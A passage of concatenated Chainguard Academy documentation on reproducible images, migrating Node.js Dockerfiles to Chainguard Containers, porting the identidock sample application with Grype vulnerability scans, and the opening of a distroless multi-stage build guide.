months time, I’m unlikely to be able to download some of these packages at these exact versions. So if you want to be able to recreate this, you’d have to have access to the old packages somehow. The second one is you may think, well, OK, but can I reproduce these packages from source? And yes, you can. But the issue is you won’t end up with binary identical versions because the APKs themselves include signatures inside them that have been signed using Wolfi’s signing key, and of course you won’t have access to the private signing key. So you’re going to be unable to create a binary identical version of the APKs. Finally, do you remember what I said earlier about build tooling? So this created with this version of apko, which I actually built from the head of the repo. I did originally try with a different version that was released and that actually failed to reproduce. And I got a different digest because it handled links slightly differently. So a minor difference in the build tooling caused the binaries to be different. So one thing I would say is if you’re playing with reproducing images, there’s a really great tool called diffoci. And you run diffoci on on your images, then it’ll tell you exactly what the difference between two images are. So if I run it here on these two images, it basically just tells me, yeah, those match. But if I run it on different images, I’ll give you a full list of which files inside the images are different and where they’re different. So a really, really useful tool there. And it’ll also allow you to filter out things like timestamp differences if you’re not interested in them. OK, so that was a long way of saying that Chainguard images are reproducible and you can even reproduce them yourselves. Please do give us a go and let me know how you get on. --- ### Migrating to Node.js Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migration-guides/migrating-node/ Last Modified: May 9, 2024 Tags: Chainguard Containers, Product, Migration Chainguard Containers are built on top of Wolfi, a Linux undistro designed specifically for containers. Our Node.js images have a minimal design (sometimes known as distroless) that ensures a smaller attack surface, which results in smaller images with few to zero CVEs. Nightly builds deliver fresh images whenever updated packages are available, which also helps to reduce the toil of manually patching CVEs. What is Distroless? Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi OS? Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. This article is intended as a guide to porting existing Dockerfiles for Node.js applications to a Chainguard Containers base. Node.js Chainguard Containers The Node.js images come in two main flavours; runtime images intended for production usage and builder images intended for use in the build-step of multi-stage builds. The builder images are distinguished by the -dev suffix (e.g., latest-dev). The production images are intentionally as minimal as possible. They have enough dependencies to run a Node.js application but no more. There is no package manager or shell, which reduces the attack surface of the image, but can also make it difficult to extend the image. The builder images have more build tooling as well as a shell and package manager, allowing them to be easily extended. We still aim to keep CVE counts as low as possible in the builder images and they can be used in production if necessary (such as when the application requires extra system dependencies at runtime), but we recommend using the builder image as the first step in a multi-stage build with the production image as the base for the final image. This extremely minimal approach to the runtime image is sometimes known as “distroless”. For a deeper exploration of distroless images and their differences from standard base images, refer to the guide on Getting Started with Distroless images. Migrating From Other Distributions Dockerfiles will often contain commands specific to the Linux Distribution they are based on. Most commonly this will be package installation instructions (e.g. apt vs yum vs apk) but also differences in default shell (e.g. bash vs ash) and default utilities (e.g. groupadd vs addgroup). Our high-level guide on Migrating to Chainguard Containers contains details about distro-based migration and package compatibility when migrating from Debian, Alpine, Ubuntu and Red Hat UBI base images. Installing Further Dependencies Sometimes your applications will require further dependencies, either at build-time, runtime or both. Wolfi has large number of software packages available, so you are likely to be able to install common packages via apk add, but be aware that packages may be named differently than in other distributions. The easiest way to search for packages is via apk tools. For example: docker run -it --rm cgr.dev/chainguard/wolfi-base f273a9aa3242:/# apk update fetch https://packages.wolfi.dev/os/aarch64/APKINDEX.tar.gz [https://packages.wolfi.dev/os] OK: 53914 distinct packages available f273a9aa3242:/# apk search cairo cairo-1.18.0-r1 cairo-dev-1.18.0-r1 cairo-gobject-1.18.0-r1 cairo-static-1.18.0-r1 cairo-tools-1.18.0-r1 harfbuzz-8.4.0-r1 harfbuzz-dev-8.4.0-r1 pango-1.52.2-r1 pango-dev-1.52.2-r1 py3-cairo-1.26.0-r0 py3-cairo-dev-1.26.0-r0 These packages can then be easily added to your Dockerfile. For more searching tips, check the Searching for Packages section of our base migration guide. Differences to Docker Official Image If you are migrating from the Docker Official Image there are a few differences that are important to be aware of. Our images run as the node user with UID 65532 by default. If you need elevated privileges for a task, such as installing a dependency, you will need to change to the root user. For example add a USER root statement into a Dockerfile. For security reasons you should make sure that the production application runs with a lower privilege user such as node. WORKDIR is set to /app which is owned by the node user. The Docker Official images have a “smart” entrypoint that interprets the CMD setting. So docker run -it node will launch the Node.js interpreter but docker run -it node /bin/sh will launch a shell. The latter does not work with Chainguard Containers. In the non -dev images, there is no shell to launch, and in the -dev images you will need to change the entrypoint e.g. docker run --entrypoint /bin/sh -it cgr.dev/chainguard/node. The image has a defined NODE_PORT=3000 environment variable which can be used by applications Our Node.js images include dumb-init which can be used to wrap the Node process in order to handle signals properly and allow for graceful shutdown. You can use dumb-init by setting an entrypoint such as: ENTRYPOINT ["/usr/bin/dumb-init", "--"] In general there are many fewer libraries and utilities in the Chainguard Container. You may find that your application has an unexpected dependency which needs to be added into the Chainguard Container. Migration Example This section has a short example of migrating a Node.js application with a Dockerfile building on node:latest to use the Chainguard Node.js Containers. The code for this example can be found on GitHub. Our starting Dockerfile uses the node:latest image from Docker Hub in a single-stage build: FROMnode:latestENV NODE_ENV productionWORKDIR/usr/src/appCOPY package.json .RUN npm installUSERnodeCOPY . .EXPOSE3000CMD npm startIf you’ve cloned the GitHub repository, you can build this image with: docker build -t node-classic-image -f Dockerfile-classic . Directly porting to Chainguard Containers with the least number of changes results in this Dockerfile: FROMcgr.dev/chainguard/node:latest-devENV NODE_ENV productionWORKDIR/usr/src/appCOPY package.json .RUN npm installUSERnodeCOPY . .EXPOSE3000ENTRYPOINT npm startHere we’ve changed the image to cgr.dev/chainguard/latest-dev and the CMD command became ENTRYPOINT. We can still do better in terms of size and security. A multi-stage Dockerfile would look like: FROMcgr.dev/chainguard/node:latest-dev AS builderENV NODE_ENV productionWORKDIR/usr/src/appCOPY package.json .RUN npm installUSERnodeCOPY . .FROMcgr.dev/chainguard/node:latestCOPY --from=builder --chown=node:node /usr/src/app /appEXPOSE3000ENV NODE_ENV=production ENV PATH=/app/node_modules/.bin:$PATHWORKDIR/appENTRYPOINT ["/usr/bin/dumb-init", "--"]CMD ["node", "app.js"]If you’ve cloned the GitHub repository, you can build this image with: docker build -t node-multi-image -f Dockerfile-multi . The advantages of this build are: we are using dumb-init so the container shuts down cleanly in response to docker stop. we do not have all the build tooling in the final image, resulting in a smaller and more secure production image Note that in a production app you may want to use a Package.lock file and the npm ci command instead of npm install to ensure the correct version of all dependencies is used. Additional Resources The Node.js image documentation contains full details on our images, including usage documentation, provenance and security advisories. The How to Port a Sample Application to Chainguard Containers article contains an example of porting a Node.js Dockerfile for a legacy application. The How to Migrate a Node.js Application to Chainguard Containers video works through an example of porting a Node.js Dockerfile. Bret Fisher has an excellent guide to creating Node.js container images, including advice for using distroless. The Debugging Distroless guide contains important information for debugging issues with distroless images. You can also refer to the Verifying Containers resource for details around provenance, SBOMs, and image signatures. --- ### How to Port a Sample Application to Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/porting-apps-to-chainguard/ Last Modified: February 5, 2025 Tags: Chainguard Containers, Product Porting Key Points Chainguard’s distroless Containers have no shell or package manager by default. This is great for security, but sometimes you need these things, especially in builder images. For those cases we have -dev variants (such as cgr.dev/chainguard/python:latest-dev) which do include a shell and package manager. Chainguard Containers typically don’t run as root, so a USER root statement may be required before installing software. The -dev variants and wolfi-base / chainguard-base use BusyBox by default, so any groupadd or useradd commands will need to be ported to addgroup and adduser. The free Starter tier of Containers provides :latest and :latest-dev versions. Our paid Production Containers offer tags for major and minor versions. We use apk tooling, so apt install commands will become apk add. Chainguard Containers are based on glibc and our packages cannot be mixed with Alpine packages. In some cases, the entrypoint in Chainguard Containers can be different from equivalent container images based on other distros, which can lead to unexpected behavior. You should always check the image’s specific documentation to understand how the entrypoint works. When needed, Chainguard recommends using a Base Container like chainguard-base or a -dev variant to install an application’s OS-level dependencies. Although -dev variants are still more secure than most popular container images based on other distros, for increased security on production environments we recommend combining them with a distroless variant in a multi-stage build. The Sample Application The application in question is identidock. This application was written for the book Using Docker about ten years ago, which shows that we can still migrate software of this age to a new container while realizing the benefits of a no-to-low CVE count. The application itself will create identicons for a user name, similar to what GitHub generates for users with no avatar. It was designed at the time to demonstrate a “microservices” approach, and as such it’s made up of 3 services: The main identidock service, which takes the requests and talks to the dnmonster service and the redis cache A NodeJS application which creates the identicons Redis which is used as a simple cache The services are put together as shown in the below diagram. The user only talks to the identidock service. The identidock service will first check the cache to see if it has already created an identicon for the input and, if not, requests a new identicon from the dnmonster service. The identicon is then returned to the user and saved to the cache if required. The book walked through using various orchestrators to deploy the application, some of which have since fallen out of usage (anyone remember fleet?). For the sake of this tutorial, we’ll use Docker Compose, which is arguably the simplest surviving orchestrator covered in the book. The first task was to get the 10-year-old application building and running again. As it was a simple example application, this was thankfully straightforward and mainly required bumping versions of dependencies and a couple of cases of replacing unmaintained libraries. For a larger project, this may well have been a major effort. The original code can be found on the using-docker GitHub repository and the updated working version (prior to moving to Chainguard Containers) can be found on the v1 branch of the repository for this tutorial. In order to follow along with the tutorial, please clone the code and switch to the v1 branch: git clone https://github.com/chainguard-dev/identidock-cg.git cd identidock-cg git switch v1 Updating the Node.js Microservice To begin, we’ll update the heart of the application – the dnmonster service. dnmonster is based on monsterid.js by Kevin Gaudin. The dnmonster container hosts an API which returns an identicon based on the input it’s given. docker run -d -p 8080:8080 amouat/dnmonster curl --output ./monster.png 'localhost:8080/monster/wolfi?size=100' In this example, we give dnmonster the input “wolfi”, for which it will produce the following image: The version of the code on the v1 branch already contains a few updates from the original code, as well as bumping versions, the codebase was moved from the old and sporadically maintained restify module to the more modern express module. The Dockerfile for this version of the dnmonster service can be found in the dnmonster folder: FROMnodeRUN apt-get update && apt-get install -yy --no-install-recommends \ libcairo2-dev libjpeg62-turbo-dev libpango1.0-dev libgif-dev \ librsvg2-dev build-essential g++#Create non-root userRUN groupadd -r dnmonster && useradd -r -g dnmonster dnmonsterRUN install -d -o dnmonster -g dnmonster /home/dnmonsterRUN mkdir -p /usr/src/appWORKDIR/usr/src/appCOPY package.json /usr/src/app/RUN npm installCOPY ./src /usr/src/appRUN chown -R dnmonster:dnmonster /usr/src/appUSERdnmonsterEXPOSE8080CMD [ "npm", "start" ]The container image can be built with: cd dnmonster docker build --pull -t dnmonster . Looking at this image: docker images dnmonster REPOSITORY TAG IMAGE ID CREATED SIZE dnmonster latest 3337171ebb44 4 minutes ago 1.79GB We can also run the Grype scanning tool to investigate if there are any known vulnerabilities present in the image: grype docker:dnmonster ✔ Loaded image dnmonster:latest ✔ Parsed image sha256:17ad85081f0b4151b30556e2750ceab3222495cfc32caec2bf6e7be3647de78e ✔ Cataloged contents 5c969fe3503a9f5e6c83117d0efa79af70380eac2abe66a756eae00351972352 ├── ✔ Packages [788 packages] ├── ✔ File digests [20,143 files] ├── ✔ File metadata [20,143 locations] └── ✔ Executables [1,343 executables] ✔ Scanned for vulnerabilities [600 vulnerability matches] ├── by severity: 7 critical, 103 high, 290 medium, 49 low, 500 negligible (195 unknown) └── by status: 7 fixed, 1137 not-fixed, 544 ignored ... This tells us that (at the time of writing) the image is 1.79 GB in size and has hundreds of known vulnerabilities. The first step in moving to Chainguard Containers is to try switching the container image name in to check if anything breaks. In this case, we’ll begin with the development variant of the Node image. Change the first line of the Dockerfile from: FROMnodeTo: FROMcgr.dev/chainguard/node:latest-devUnlike the cgr.dev/chainguard/node:latest image, the :latest-dev version includes a shell and package manager, which we will need for some of the build steps. In general, it’s better to use the more minimal :latest version where possible in order to keep the size down and reduce the tooling available to attackers. Often the :latest-dev container image can be used as a build step in a multi-stage, with a more minimal image such as :latest used in the final production image. If you try building this image, you’ll find that it breaks in several places. The container image needs to install various libraries so that it can compile the node-canvas dependency, and this looks a bit different in Debian than it does in Wolfi (the OS powering Chainguard Containers). In Wolfi, we first need to switch to the root user to install software and we use apk add instead of apt-get. We then need to figure out the Wolfi equivalents of the various Debian packages, which may not always have a one-to-one correspondence. There are tools to help here – you can consult our migration guides and use apk tools (like apk search libjpeg), but searching the Wolfi GitHub repository for package names will often provide you with what you’re looking for. Make these changes by replacing the RUN apt-get … line with the following RUN apk update and adding a USER root line. The start of the Dockerfile should look like this: FROMcgr.dev/chainguard/node:latest-devUSERrootRUN apk update && apk add \ cairo-dev libjpeg-turbo-dev pango-dev giflib-dev python3 make gcc\ librsvg-dev glib-dev harfbuzz-dev fribidi-dev expat-dev libxft-dev\ libfontconfig1The next change we need to make is to the RUN groupadd … line. Chainguard Containers use BusyBox by default, which means groupadd needs to become addgroup. Rewrite the line so that it looks like this: RUN addgroup dnmonster && adduser -D -G dnmonster dnmonsterFinally, the default entrypoint for the Chainguard container image is /usr/bin/node. If we leave the CMD as it is, it will be interpreted as an argument to node, which isn’t what we want. The Docker official image uses an entrypoint script to interpret commands, but this isn’t available in the cgr.dev/chainguard/node:latest-dev image. The easiest fix is to change the CMD command to ENTRYPOINT which will override the /usr/bin/node command: ENTRYPOINT [ "npm", "start" ]Once you’ve made all these changes, you should have a Dockerfile that looks like: FROMcgr.dev/chainguard/node:latest-devUSERrootRUN apk update && apk add \ cairo-dev libjpeg-turbo-dev pango-dev giflib-dev python3 make gcc\ librsvg-dev glib-dev harfbuzz-dev fribidi-dev expat-dev libxft-dev\ libfontconfig1#Create non-root userRUN addgroup dnmonster && adduser -D -G dnmonster dnmonsterRUN install -d -o dnmonster -g dnmonster /home/dnmonsterRUN mkdir -p /usr/src/appWORKDIR/usr/src/appCOPY package.json /usr/src/app/RUN npm installCOPY ./src /usr/src/appRUN chown -R dnmonster:dnmonster /usr/src/appUSERdnmonsterEXPOSE8080ENTRYPOINT [ "npm", "start" ]At this point, we have a version of dnmonster that works and is equivalent to the previous version. We can build this image: docker build --pull -t dnmonster-cg . ... And investigate it again: docker images dnmonster-cg REPOSITORY TAG IMAGE ID CREATED SIZE dnmonster-cg latest 5b785d38a022 About a minute ago 1.55GB grype docker:dnmonster-cg ✔ Vulnerability DB [updated] ✔ Loaded image dnmonster-cg:latest ✔ Parsed image sha256:4795459b2f4a28bb721b19b798b4f78d6affb6b2a43096f8752576e6ce3fcd2c ✔ Cataloged contents aa53bb57b8e994e65de7f3e19da6b1945a86005fe76961383166248aad56f6fe ├── ✔ Packages [599 packages] ├── ✔ File digests [14,204 files] ├── ✔ File metadata [14,204 locations] └── ✔ Executables [733 executables] ✔ Scanned for vulnerabilities [2 vulnerability matches] ├── by severity: 0 critical, 0 high, 0 medium, 0 low, 0 negligible (2 unknown) └── by status: 0 fixed, 2 not-fixed, 0 ignored NAME INSTALLED FIXED-IN TYPE VULNERABILITY SEVERITY git 2.48.1-r0 apk CVE-2024-52005 Unknown python-3.13 3.13.1-r5 apk CVE-2025-0938 Unknown So the image is a bit smaller at 1.55GB, but more importantly, we’ve vastly reduced the number of vulnerabilities. There are now only 2 known vulnerabilities. But we can still do more. In particular, although 1.55GB is smaller than the previous version, it’s still a large image. To get the size down, we can use a multi-stage build where the built assets are copied into a minimal Production Container, which doesn’t include build tooling or dependencies required during development. Ideally, we would use the cgr.dev/chainguard/node:latest image for this, but we also need to install the dependencies for node-canvas, which means we need an image with apk tools. Normally it’s recommended to use a :latest-dev image for this, but in node’s case, the :latest-dev image is relatively large due to the inclusion of build tooling, such as C compilers, that can be required by Node modules. Instead, we’re going to use the wolfi-base image and install nodejs as a package. To do this, replace the Dockerfile with the following: FROMcgr.dev/chainguard/node:latest-dev AS buildUSERrootRUN apk update && apk add \ cairo-dev libjpeg-turbo-dev pango-dev giflib-dev python3 make gcc \ librsvg-dev glib-dev harfbuzz-dev fribidi-dev expat-dev libxft-dev \ libfontconfig1#Create non-root userRUN addgroup dnmonster && adduser -D -G dnmonster dnmonsterRUN install -d -o dnmonster -g dnmonster /home/dnmonsterRUN mkdir -p /usr/src/appWORKDIR/usr/src/appCOPY package.json /usr/src/app/RUN npm installCOPY ./src /usr/src/appRUN chown -R dnmonster:dnmonster /usr/src/appUSERdnmonsterEXPOSE8080ENTRYPOINT [ "npm", "start" ]FROMcgr.dev/chainguard/wolfi-baseRUN apk update && apk add nodejs \ cairo-dev libjpeg-turbo-dev pango-dev giflib-dev \ librsvg-dev glib-dev harfbuzz-dev fribidi-dev expat-dev libxft-devWORKDIR/appCOPY --from=build /usr/src/app /appEXPOSE8080ENTRYPOINT [ "node", "server.js" ]We’ve added an as build statement to the first FROM line and added a second build that starts on the line FROM cgr.dev/chainguard/wolfi-base. The second build installs the required dependencies (including Node.js) before copying the build artifacts from the first image. We also changed the entrypoint to execute Node directly, as the container image no longer contains npm. Build and investigate the image: docker build --pull -t dnmonster-multi . … docker images dnmonster-multi REPOSITORY TAG IMAGE ID CREATED SIZE dnmonster-multi latest a2efea945fb9 2 minutes ago 620MB grype dnmonster-multi ✔ Loaded image dnmonster-multi:latest ✔ Parsed image sha256:08c8f2b6f0bc8b55a5962abfb9daaee9030fc37c19875592ea53f896f29a4c60 ✔ Cataloged contents 37c6abd0a832ad48e4a604a392d6ebbea1a7483ddedf94b7762186de9e991cff ├── ✔ Packages [343 packages] ├── ✔ File digests [8,887 files] ├── ✔ File metadata [8,887 locations] └── ✔ Executables [601 executables] ✔ Scanned for vulnerabilities [0 vulnerability matches] ├── by severity: 0 critical, 0 high, 0 medium, 0 low, 0 negligible └── by status: 0 fixed, 0 not-fixed, 0 ignored No vulnerabilities found This results in a container image that is now 620MB in size and has 0 CVEs. We’re most of the way now, but there are still a couple of finishing touches to make. The first one is to remove the dnmonster user. The wolfi-base image already defines a nonroot user, so we can make the build a little less complicated by using that user directly. The second one is to add in a process manager. We have node running as the root process (PID 1) in the container, which isn’t ideal as it doesn’t handle some of the responsibilities that come with running as PID 1, such as forwarding signals to subprocesses. You can see this most clearly when you try to stop the image – it takes several seconds as the process doesn’t respond to the SIGTERM signal sent by Docker and has to be hard killed with SIGKILL. To fix this, we can add tini, a small init for containers. The tini binary will run as PID 1, launch npm as a subprocess and take care of PID 1 responsibilities. Now, the final Dockerfile looks like this: FROMcgr.dev/chainguard/node:latest-dev AS buildUSERrootRUN apk update && apk add \ cairo-dev libjpeg-turbo-dev pango-dev giflib-dev python3 make gcc \ librsvg-dev glib-dev harfbuzz-dev fribidi-dev expat-dev libxft-dev \ libfontconfig1RUN mkdir -p /usr/src/appWORKDIR/usr/src/appENV NODE_ENV productionCOPY package.json /usr/src/app/RUN npm installCOPY ./src /usr/src/appFROMcgr.dev/chainguard/wolfi-baseRUN apk update && apk add tini nodejs \ cairo-dev libjpeg-turbo-dev pango-dev giflib-dev \ librsvg-dev glib-dev harfbuzz-dev fribidi-dev expat-dev libxft-devWORKDIR/appCOPY --from=build /usr/src/app /appEXPOSE8080ENTRYPOINT ["tini", "--" ]CMD [ "node", "server.js" ]This version is also available in the main branch of the repository. Build it: docker build --pull -t dnmonster-final . … And run it to prove it still works: docker run -d -p 8080:8080 dnmonster-final ... curl --output ./monster.png 'localhost:8080/monster/wolfi?size=100' Note: If you receive a “port is already allocated” error, be sure to clean up the previous container. Check what containers are running with docker container ls and remove it with docker rm -f <container-name>. There are still more tweaks that could be made. Bret Fisher has some excellent resources on building Node.js containers in this GitHub repo. But for the purposes of this example app, we’ve made excellent progress. Updating the Python Microservice The next service we will look at updating is Identidock, the main entrypoint for the application. Identidock is responsible for looking up requests in the cache and falling-back to calling the dnmonster service if they’re not present. Again, the version of the code on the v1 branch already contains a few updates from the original code, but in this case all that was needed was to bump various libraries to newer versions. The Dockerfile for the v1 version can be found in the identidock folder and looks like: FROMpythonRUN groupadd -r uwsgi && useradd -r -g uwsgi uwsgiRUN pip install Flask==3.1.0 uWSGI requests==2.32.3 redis==5.2.1WORKDIR/appUSERuwsgiCOPY app /appCOPY cmd.sh /EXPOSE9090 9191CMD ["/cmd.sh"]The image can be built with the following, assuming the current directory is the root of repo: cd identidock docker build --pull -t identidock . … Inspect the container image: docker images identidock REPOSITORY TAG IMAGE ID CREATED SIZE identidock latest a718358590ff 11 seconds ago 1.51GB Scan for vulnerabilities: grype docker:identidock ✔ Loaded image identidock:latest ✔ Parsed image sha256:0b4ac715984206f1e9134aa48a8efeba88e7badc3969d6f8c79cca98b47df676 ✔ Cataloged contents 5ebeaac39f8f941d41629fdb1e13c39bc73558caadfe7699963b4b3a6c55a222 ├── ✔ Packages [452 packages] ├── ✔ File digests [20,129 files] ├── ✔ File metadata [20,129 locations] └── ✔ Executables [1,428 executables] ✔ Scanned for vulnerabilities [621 vulnerability matches] ├── by severity: 7 critical, 100 high, 296 medium, 47 low, 515 negligible (200 unknown) └── by status: 2 fixed, 1163 not-fixed, 544 ignored At the time of writing, this container image is 1.51GB with hundreds of vulnerabilities (7 critical) according to Grype. Again as a first step, we will try to switch out directly to the Chainguard Container. To do this, edit the Dockerfile so the first line reads: FROMcgr.dev/chainguard/python:latest-devBefore building the image we need to also update groupadd syntax to use the addgroup format. As Chainguard Containers don’t run as root by default for security reasons, we also need to change to the root user for this command to work. Replace the RUN groupadd line with the lines: USERrootRUN addgroup uwsgi && adduser -D -G uwsgi uwsgiThe image now builds, but there are issues due to differences in the image entrypoint. If you run the container image, you will get a confusing error message such as: `File "/cmd.sh", line 4` if [ "$ENV" = 'DEV' ]; then ^^^^^^ SyntaxError: cannot assign to literal here. Maybe you meant '==' instead of '='? This is caused by the Chainguard Containers using /usr/bin/python as the entrypoint, which means the cmd.sh entrypoint script is interpreted by Python instead of the shell. Fixing this can be as easy as changing the entrypoint, but let’s take a look at the script first. This is the file cmd.sh in the identidock directory: #!/bin/bash set -e if [ "$ENV" = 'DEV' ]; then echo "Running Development Server" exec python "/app/identidock.py" elif [ "$ENV" = 'UNIT' ]; then echo "Running Unit Tests" exec python "tests.py" else echo "Running Production Server" exec uwsgi --http 0.0.0.0:9090 --wsgi-file /app/identidock.py \ --callable app --stats 0.0.0.0:9191 fi This script decides how to run the application depending on how the ENV environment variable is set. The idea here is to allow us to use the same image in development, testing, and production. This approach is no longer recommended as it leads to development tooling being present in the production environment. Even though the development tooling isn’t run in production, it is still bloating the image and is potentially exploitable by attackers. Therefore, we will use a different approach and break the Dockerfile into separate development and production images. Let’s skip to the final Dockerfile for our image and walk through the changes made. These changes address multiple issues, beyond just having multiple images, and are based on the Chainguard Academy guide to Python images. Replace the Dockerfile with this one (this is also available on the “main” branch): FROMcgr.dev/chainguard/python:latest-dev AS devENV LANG=C.UTF-8ENV PYTHONDONTWRITEBYTECODE=1 ENV PYTHONUNBUFFERED=1 ENV PATH="/app/venv/bin:$PATH"WORKDIR/appRUN python -m venv /app/venvCOPY requirements.txt ./RUN pip install --no-cache-dir -r requirements.txtCOPY app /appEXPOSE5000ENTRYPOINT ["python"]CMD ["identidock.py"]FROMcgr.dev/chainguard/pythonWORKDIR/appENV PYTHONUNBUFFERED=1 ENV PATH="/app/venv/bin:$PATH"COPY app/identidock.py ./COPY --from=dev /app/venv /app/venvEXPOSE9090ENTRYPOINT [ "gunicorn", "-b", "0.0.0.0:9090", "identidock:app" ]And add the file requirements.txt to the current directory (identidock) with the following contents: Flask==3.1.0 requests==2.32.3 redis==5.2.1 gunicorn==23.0.0 The first thing to notice is that we have a multistage build now. If you want the Development container image rather than the production one, you can specify it during docker build: docker build --pull --target dev -t identidock:dev . Otherwise, you will get the standard variant only. There are several more environment variables defined. These prevent the creation of Python bytecode and buffering of output. For more detail on why this is useful, see the blog PYTHONDONTWRITEBYTECODE and PYTHONUNBUFFERED Explained. The installation of pip modules has moved to the requirements.txt file. The main thinking here is that we don’t need to update the Dockerfile each time a dependency is updated or changed. The development server runs on port 5000, while the production server runs on port 9090. We could edit this so they both run on the same port, but this approach reduces the chance of accidentally running the development server in production. The development server is started directly from the entrypoint, so we are no longer dependent on an entrypoint script, simplifying our architecture. To get a minimal, clean production install, we are using a Python virtual environment(venv) in the development image to isolate all dependencies, which are then copied over to the production image. Finally, the production image has been changed to use gunicorn as uwsgi has entered “maintenance mode”. Build the final image: docker build --pull -t identidock-cg . And take a look at it: docker images identidock-cg REPOSITORY TAG IMAGE ID CREATED SIZE identidock-cg latest 1b5689af14a1 14 seconds ago 122MB Run a scan with grype: grype docker:identidock-cg ✔ Loaded image identidock-cg:latest ✔ Parsed image sha256:c79295258a2b67f2a0eda49c41a2d791888df6cc7b3bdea694d810ec5d2916d8 ✔ Cataloged contents 6c8262ac152209ef3e36cad9c49c0d3e3f16d7cbfeafad9abb569c7690c68c2e ├── ✔ Packages [45 packages] ├── ✔ File digests [1,667 files] ├── ✔ File metadata [1,667 locations] └── ✔ Executables [135 executables] ✔ Scanned for vulnerabilities [1 vulnerability matches] ├── by severity: 0 critical, 0 high, 0 medium, 0 low, 0 negligible (1 unknown) └── by status: 0 fixed, 1 not-fixed, 0 ignored NAME INSTALLED FIXED-IN TYPE VULNERABILITY SEVERITY python-3.13 3.13.1-r5 apk CVE-2025-0938 Unknown The result of all these changes is that the production image is only 122 MB (down from 1.51GB, so an enormous saving of over a GB) and has 1 CVE (down from hundreds). This is a huge improvement! Further information on using Chainguard Containers with Python can be found in our Getting Started guide. Replacing the Redis Container and Updating the Docker Compose File Updating Redis is straightforward. We’re not making any changes to the application image, so all we need to do is directly update the reference to redis:7 in the Docker Compose file to cgr.dev/chainguard/redis. The new container image requires no extra configuration, but we go from a 195 MB image with 129 vulnerabilities to a 33 MB image with 0 CVEs (again according to Grype). To update Compose, in the top level directory of the repo, replace the content of the docker-compose.yml file with the following: name:identidockservices:frontend:build:identidockports:- "9090:9090"dnmonster:build:dnmonsterredis:image:cgr.dev/chainguard/redisIf you now run docker compose up -–build, you should have a working application that can be reached on port 9090: Screenshot of running application There are some differences between this version and the original. The environment variable used for switching between image variants has been removed and the ports have changed to reflect the default port used in gunicorn. This Compose file doesn’t contain support for a development workflow currently – ideally we would be able to quickly iterate on our code without building a new image. The original file used volumes to achieve this, but this isn’t something we want to do with the production image. One solution is to have a separate development Compose file, which will build the development image and use a volume to mount code at runtime for immediate feedback. New versions of Docker also support Compose Watch which can be a more efficient and granular solution than volume mounts. See What is Docker Compose Watch and what problem does it solve? for an introductory tutorial on using Compose Watch. Conclusion Porting our application to Chainguard Containers was relatively straightforward. There were some gotchas around differences to other images, such as different entrypoint settings and names for packages. The largest part of the puzzle was moving from single image builds to multistage builds that take advantage of the minimal Chainguard runtime images for Python and NodeJS. Once all this was done, we ended up with a much smaller set of images and with a drastically reduced number of CVEs. Cleaning Up To clean up the resources used in this guide, first stop any containers started by Compose: docker-compose down Then check docker ps to see if any containers are still running and stop them with docker stop <id>. You can then remove any container images you’ve built: docker rmi -f dnmonster dnmonster-cg dnmonster-multi identidock identidock:dev identidock-cg --- ### Getting Started with Distroless Container Images URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/getting-started-distroless/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product, Overview About Distroless Container Images Distroless container images are a type of container image that is designed to be minimal. Unlike traditional images based on Debian or Ubuntu — which include package managers, utilities, and shells — distroless images typically contain only essential software required to run an application or service. This minimal approach offers several benefits, including: Enhanced Security: By stripping out unnecessary components, distroless images reduce the potential attack surface for vulnerabilities. With fewer extraneous programs, there are fewer opportunities for malicious actors to exploit. Simplified Dependency Management: Traditional container images can introduce dependency bloat, making it difficult to track and manage exactly what’s included. Distroless images keep things clear by only containing what’s directly required for the application to function. Potentially Smaller Image Sizes: By eliminating extraneous OS components, distroless images can be significantly smaller than their full-blown counterparts. Chainguard offers a mix of distroless and container images, which are minimalist and contain provenance attestations for increased security, and development (or -dev) images, which feature development tools like a shell or package manager. Since distroless images have fewer tools and don’t come with a package manager, some adaptation might be necessary when migrating from traditional base images. A typical approach is using multi stage builds to compose a final distroless image containing the additional artifacts required by the application in order to run successfully. Multi Stage Builds A multi stage build is a technique for creating slimmer and more efficient container images. It allows you to define multiple stages within a single Dockerfile. Each stage acts like a separate build environment with its own base image and instructions. The key benefit of multi stage builds is that they enable you to separate the build process from the final runtime environment. This separation helps in reducing the final image size by: Using different base images: You can leverage a larger image containing all the build tools in the initial stage and then switch to a smaller, leaner base image for the final stage that only includes the necessary runtime dependencies for your application. Excluding unnecessary layers: By separating the build and runtime stages, you can exclude all the temporary files, build tools, and intermediate artifacts from the final image. These elements are only required during the build process and not needed when running the application. Overall, multi stage builds promote efficient container images by minimizing their size and optimizing their contents for execution. Example 1: Distroless images as runtime for static binaries Distroless images are typically designed to work as platforms for running workloads in as minimal an environment as possible. In the case of languages that can compile completely static binaries (such as C and Rust), the static base image can be used as a runtime. You’ll still need to get your application compiled in a separate build stage that has the tooling necessary to build it. In this example, we’ll build a distroless image to run a “Hello World” program in C. Start by creating a directory for the demo. We’ll call it distroless-demo. mkdir ~/distroless-demo && cd $_ Create a new Dockerfile within this directory. You can use nano or other command line editor of your choice. nano Dockerfile The following Dockerfile will build a final distroless image using two distinct build stages. The first stage, named build, builds a C program using the cgr.dev/chainguard/gcc-glibc:latest image. The final image, which is then based on the cgr.dev/chainguard/static:latest distroless image, will copy the compiled binary from the build environment and define it as the entry point command for the final image. # syntax=docker/dockerfile:1.4FROMcgr.dev/chainguard/gcc-glibc:latest AS buildCOPY <<EOF /hello.c#include <stdio.h>int main() { printf("Hello Distroless!%c",0x0A); }EOFRUN cc -static /hello.c -o /helloFROMcgr.dev/chainguard/static:latestCOPY --from=build /hello /helloCMD ["/hello"]Run the following command to build the demo image and tag it as c-distroless: DOCKER_BUILDKIT=1 docker build -t c-distroless . If you receive an error, you may try removing the top line of the Dockerfile. Now you can run the image with: docker run c-distroless You should get output like this: Hello Distroless! You can note the size of the resulting image. docker images c-distroless REPOSITORY TAG IMAGE ID CREATED SIZE c-distroless latest cd3bb76a84f5 45 seconds ago 2.04MB If you look into the image layers with docker inspect c-distroless, you’ll also notice that it has only two layers: a single layer from the static image that serves as base for the final image, and one layer with the COPY command that brings in the compiled binary from the build stage. "RootFS": { "Type": "layers", "Layers": [ 